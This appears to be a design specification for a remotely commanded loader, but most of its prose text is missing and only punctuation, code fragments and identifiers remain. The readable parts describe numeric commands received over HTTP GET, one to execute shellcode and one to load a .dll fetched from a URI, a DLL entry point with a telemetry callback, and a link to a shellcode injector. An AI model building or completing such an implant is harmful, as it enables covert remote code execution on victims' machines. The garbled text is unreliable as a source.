

      .
        -    ,   .
                 .
        .

     /-  ,          .
    ,   .



   ,   .
  ,         .

 :
-   ()
-   
-  

  -  .

  -   - ,  .dll (  .dll;     ).

     ,  ,      , ,  .

         :
-        ;
-        .

     .

        PE- .dll -     .
  - https://github.com/DimopoulosElias/SimpleShellcodeInjector/blob/master/SimpleShellcodeInjector.c
           SEH/VEH- .
      ,      .dll  .

     .



   ( -,  ,   )     1.
   ,      HTTP GET .

 :
%code% %timeout% [%args%]

   code    -  
   timeout -    (0 -           )
   args    -      

0   %timeout%                                          -  .  -  ,          .
117 %timeout% %payload%                                -     shell-.   . Shell-     .
                                                         ,     17    . ,      .
                                                            ,  -  ,    ,  - .
111 %timeout% ?caching? %payload% [%URI% [%args]]      -     .dll.
                                                         caching == 0    . FIXME        ?   ?
                                                                 == 1       
                                                         URI -     .
                                                                ,      , 
                                                               - ().
                                                                .
?114 %timeout%                                          -   .      .

        1.


 -

          .
   ,      .

Dll        :

DWORD WINAPI EntryPoint(
    TELEMETRY_PROC lpTelemetryProc,
    LPVOID payload,
    SIZE_T paylen,
    LPVOID args,
    SIZE_T arglen
)

TELEMETRY_PROC  :

VOID WINAPI send_telemetry(CONST LPVOID message, SIZE_T len)
  callback'     .

    send_telemetry  ,           .

payload, paylen -   .     %URI% ( 111)        .

FIXME     -          ?     ,      .

args, arglen -          .
     .
      :
-    %id%   
-   
         ( ,  )



  " .exe", " "     .
     -    ,     .      /.
   ,    ,      .

   :
-  
-   
-    
-    : /
-   1 ( )
-   2 ( )
- ...

   -     10-13 .
  -  ( )     10-13.
